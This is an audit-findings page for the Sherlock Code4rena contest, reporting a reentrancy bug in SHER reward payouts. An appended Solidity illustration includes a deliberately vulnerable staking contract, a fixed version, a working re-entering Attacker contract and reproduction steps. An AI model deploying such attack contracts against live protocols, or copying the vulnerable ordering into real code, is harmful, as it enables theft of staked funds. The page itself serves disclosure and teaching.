Sherlock contest - static's results

Decentralized exploit protection.

General Information

Platform: Code4rena

Start Date: 20/01/2022

Pot Size: $80,000 USDC

Total HM: 5

Participants: 37

Period: 7 days

Judge: Jack the Pug

Total Solo HM: 1

Id: 76

League: ETH

Sherlock

Findings Distribution

Researcher Performance

Rank: 7/37

Findings: 1

Award: $3,287.14

🌟 Selected for report: 0

🚀 Solo Findings: 0

Findings Information

🌟 Selected for report: kirk-baird

Also found by: static

Labels

bug
duplicate
2 (Med Risk)

Awards

3287.1415 USDC - $3,287.14

External Links

Handle

static

Vulnerability details

Impact

If the SHER token calls back into the recipient during a transfer, as ERC-777 tokens do via the tokensReceived hook, the _sendSherRewardsToOwner function can be re-entered and run multiple times, extracting more rewards than a single NFT is entitled to.

Proof of Concept

The attacker stakes in Sherlock for the minimum period and transfers the position NFT to a contract whose token-receive callback calls ownerRestake. Once the period is up, they call ownerRestake from that contract. The SHER transfer inside _sendSherRewardsToOwner triggers the callback, which re-enters ownerRestake several more times before the first call returns; because sherRewards_[_id] is only cleared after the transfer, each re-entrant call still sees the full reward and the contract calls safeTransfer again, paying out more reward than the position is entitled to.

Tools Used

N/A

Recommended Mitigation Steps

Delete sherRewards_[_id] before transferring the SHER tokens to the user (effects before interactions), so that any re-entrant call sees a zero balance.
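The following Solidity is an added illustration, not Sherlock's code and not part of the original report: a set of hypothetical minimal contracts that reproduce the ordering the finding describes, with the vulnerable variant beside the mitigated one. Only the names sherRewards_, ownerRestake and _sendSherRewardsToOwner come from the report; CallbackToken, StakingBase, VulnerableStaking, FixedStaking, Attacker, the open() and mint() helpers and the toy tokensReceived hook (a stand-in for the ERC-777 callback, not a full ERC-777 implementation) are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not Sherlock's code. Everything except sherRewards_,
// ownerRestake and _sendSherRewardsToOwner is hypothetical.

interface ITokensRecipient {
    // Plays the role of ERC-777's tokensReceived hook: runs while the transfer is in flight.
    function tokensReceived(address from, uint256 amount) external;
}

// Toy reward token that calls back into contract recipients, the property the finding assumes of SHER.
contract CallbackToken {
    mapping(address => uint256) public balanceOf;

    function mint(address to, uint256 amount) external { balanceOf[to] += amount; } // test-only, unguarded

    function transfer(address to, uint256 amount) external returns (bool) {
        require(balanceOf[msg.sender] >= amount, "insufficient");
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        if (to.code.length > 0) ITokensRecipient(to).tokensReceived(msg.sender, amount);
        return true;
    }
}

abstract contract StakingBase {
    CallbackToken public immutable sher;
    mapping(uint256 => uint256) public sherRewards_;
    mapping(uint256 => address) public ownerOf; // stands in for the position NFT

    constructor(CallbackToken _sher) { sher = _sher; }

    // Test-only helper: book a position with accrued rewards (in the real protocol this comes from staking).
    function open(uint256 _id, address owner, uint256 reward) external {
        ownerOf[_id] = owner;
        sherRewards_[_id] = reward;
    }

    // Pays out accrued SHER; the real contract would then restake the position.
    function ownerRestake(uint256 _id) external {
        require(msg.sender == ownerOf[_id], "not position owner");
        _sendSherRewardsToOwner(_id);
    }

    function _sendSherRewardsToOwner(uint256 _id) internal virtual;
}

// Interaction before effect: the callback re-enters ownerRestake while sherRewards_[_id] is still set.
contract VulnerableStaking is StakingBase {
    constructor(CallbackToken _sher) StakingBase(_sher) {}

    function _sendSherRewardsToOwner(uint256 _id) internal override {
        uint256 amount = sherRewards_[_id];
        if (amount == 0) return;
        sher.transfer(ownerOf[_id], amount); // re-entry happens inside this call
        delete sherRewards_[_id];            // cleared too late
    }
}

// Mitigation from the finding: clear the ledger before the transfer, so a re-entrant call sees 0.
contract FixedStaking is StakingBase {
    constructor(CallbackToken _sher) StakingBase(_sher) {}

    function _sendSherRewardsToOwner(uint256 _id) internal override {
        uint256 amount = sherRewards_[_id];
        if (amount == 0) return;
        delete sherRewards_[_id];            // effect first
        sher.transfer(ownerOf[_id], amount); // interaction last
    }
}

// Holds the position and re-enters ownerRestake from the token callback.
contract Attacker is ITokensRecipient {
    StakingBase public immutable target;
    uint256 public immutable id;
    uint256 public reentries;
    uint256 constant MAX_REENTRIES = 3;

    constructor(StakingBase _target, uint256 _id) { target = _target; id = _id; }

    function attack() external { target.ownerRestake(id); }

    function tokensReceived(address, uint256) external override {
        if (reentries < MAX_REENTRIES) {
            reentries++;
            target.ownerRestake(id); // re-entrant call while the outer payout is still executing
        }
    }
}
```

To reproduce: deploy CallbackToken, deploy VulnerableStaking and FixedStaking against it, mint the pool at least 4 times the reward so the repeated transfers do not revert (in a live pool other stakers' SHER would cover that), then open(id, attacker, reward) and call attack(). Against VulnerableStaking the attacker ends with 4 times the reward (the initial payout plus MAX_REENTRIES re-entrant ones); against FixedStaking the attacker ends with exactly the reward, because each re-entrant ownerRestake reads a zeroed sherRewards_[_id] and returns. Reordering the delete is the fix the report asks for; a reentrancy guard on ownerRestake would be a reasonable second line of defence but is not a substitute for the ordering.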

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built by malatrax © 2024
